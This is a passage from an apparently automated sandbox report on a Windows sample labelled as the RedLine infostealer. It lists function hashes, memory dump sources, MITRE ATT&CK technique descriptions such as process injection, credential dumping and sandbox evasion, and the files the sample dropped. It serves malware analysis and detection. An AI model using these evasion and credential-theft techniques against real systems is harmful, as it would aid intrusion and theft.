Opcode ID: 41ae362e1ae8536632af2a2ad84ab726a99ddd47a084510589b81c8b34f4fb70
Instruction ID: 1c9ee57b0b30e6c693327499b5a824f08cc9380be0dd417cc4c40ea73db148ae
Opcode Fuzzy Hash: 41ae362e1ae8536632af2a2ad84ab726a99ddd47a084510589b81c8b34f4fb70
Instruction Fuzzy Hash: 61216935B40104AFCB54DF69D984EAABBB2EF88724F1184A9E9059F3A5DA31EC05CB10

Function 0117D054 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1875714538.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_117d000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e05915529a88e0f67340eee461cce1274bc2f16bbf5343dde8d895fa6bd9968
Instruction ID: ec50818b69565487ceb32a6f0cfc4dd190910ae6b5db9da01aa6b205399368b8
Opcode Fuzzy Hash: 6e05915529a88e0f67340eee461cce1274bc2f16bbf5343dde8d895fa6bd9968
Instruction Fuzzy Hash: 9521E272504244DFCF1A9F54E9C0B26BFB5FF88314F24C269E9090A356C336D416CBA2

Function 0118D2C4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1875827457.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_118d000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 597d48fadc1b947a9bcf5dda02299b757833286732607d47b9fb770d06597d7d
Instruction ID: 9eb37c04dc119ff37c91ea23dc310a193ebf3c35edb78afcc57b75a760ceba34
Opcode Fuzzy Hash: 597d48fadc1b947a9bcf5dda02299b757833286732607d47b9fb770d06597d7d
Instruction Fuzzy Hash: 2D2126B1508304DFDF09EF58E5C0B2ABB65FB84324F24C569EC494B286C33AD446CEA2

Function 0118D474 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1875827457.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_118d000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ee94ea1c8d3ce0feb29ec21714b50d0b4f4466b231501bc14f8d8504e8faabb
Instruction ID: 8a395ed4096ef6837db5f1b8f4ecef483eedd6ca101abd2a10e3283414a0eae4
Opcode Fuzzy Hash: 2ee94ea1c8d3ce0feb29ec21714b50d0b4f4466b231501bc14f8d8504e8faabb
Instruction Fuzzy Hash: 0521F571604300DFDF09EF98E5C4B26BBB5FB84318F20C5AEE8094B296C336D446CA62

Function 0117D04F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1875714538.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_117d000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
Instruction ID: f4304ec90f071217449f29ec1bab4b6255418af1265e65b7e70b4f6e47cbe2bd
Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
Instruction Fuzzy Hash: CA21CD72504284DFCF0ACF54E9C4B16BF72FF88314F28C2A9D9480A256C33AD426CB91

Function 0118D2BF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1875827457.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_118d000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction ID: 568e367a953f774463d40e7ecf7e80e329d20639983dea3fc10a8ac6faf26211
Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction Fuzzy Hash: 741190B5508280DFDB16DF14E5C4B19BF61FB84224F24C6AADC494B696C33AD44ACFA1

Function 0118D46F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1875827457.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_118d000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: c9ca4955d0b21cc43733184da1d756bdcb31193311cc0767d6972c95e35a2107
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 32117975504280DFDB06DF54D5C4B15BBB2FB88218F24C6AAD8494B696C33AD44ACF62

Function 0117DA81 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1875714538.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_117d000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b26c6e33a874a95117b2475ad4a554828150efd538042e9b3cc723d9d39782ec
Instruction ID: e5b15409bfaa50c0d75208fec77076cbe5b8a2175aba5a23d9d073e89720e927
Opcode Fuzzy Hash: b26c6e33a874a95117b2475ad4a554828150efd538042e9b3cc723d9d39782ec
Instruction Fuzzy Hash: 03012B3110C3489EEB19AAA9DD84767BFB8FF41320F18C569ED095E386C378D880C672

Function 0117DA80 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1875714538.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_117d000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a06a599d63c6e98dd9de807d1afe624507fcf44723cb8f88f3d8c51e50fbb38e
Instruction ID: 440b1a3eb7161ecd0a791184f53024b86384dfcc1688f3ea01479ce9ffb52d9e
Opcode Fuzzy Hash: a06a599d63c6e98dd9de807d1afe624507fcf44723cb8f88f3d8c51e50fbb38e
Instruction Fuzzy Hash: 99F0C271108344AEEB158A1AD8C4B63FFA8EF40734F18C45AED084E286C3799844CA70

Non-executed Functions

Function 067A0D50 Relevance: 10.3, Strings: 8, Instructions: 301COMMON

Download Yara Rule

Strings

$^q, xrefs: 067A0F82
$^q, xrefs: 067A0E4E
$^q, xrefs: 067A0E42
$^q, xrefs: 067A0E1C
$^q, xrefs: 067A0F00
$^q, xrefs: 067A0F76
$^q, xrefs: 067A0F50
$^q, xrefs: 067A0DCC

Memory Dump Source

Source File: 00000002.00000002.1884129804.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67a0000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: dcf8cf7a9eb1dda207ee74446c7a1e6d539f29ab7415433e9133c01f5dad3e5c
Instruction ID: 6728d5300af28423d80730103955a7b8c2f6eab36d4a21225daca7a25887c189
Opcode Fuzzy Hash: dcf8cf7a9eb1dda207ee74446c7a1e6d539f29ab7415433e9133c01f5dad3e5c
Instruction Fuzzy Hash: E1B1C030B043498FDB589B69C9449BEBBF6BFC8204F14896AE406DB391CB35DC46CB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ljMiHZ8MwZ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ljMiHZ8MwZ.exe.log

C:\Users\user\AppData\Local\Temp\tmp42E5.tmp

C:\Users\user\AppData\Local\Temp\tmp42F6.tmp

C:\Users\user\AppData\Local\Temp\tmp4306.tmp

C:\Users\user\AppData\Local\Temp\tmp4317.tmp

C:\Users\user\AppData\Local\Temp\tmp4318.tmp

C:\Users\user\AppData\Local\Temp\tmp4329.tmp

C:\Users\user\AppData\Local\Temp\tmp4339.tmp

C:\Users\user\AppData\Local\Temp\tmp58D2.tmp

C:\Users\user\AppData\Local\Temp\tmp58E2.tmp

C:\Users\user\AppData\Local\Temp\tmp58F3.tmp

C:\Users\user\AppData\Local\Temp\tmp5D0B.tmp

C:\Users\user\AppData\Local\Temp\tmp5D1B.tmp

C:\Users\user\AppData\Local\Temp\tmp5D2C.tmp

C:\Users\user\AppData\Local\Temp\tmp5D2D.tmp

C:\Users\user\AppData\Local\Temp\tmp5D2E.tmp

Windows Analysis Report
ljMiHZ8MwZ.exe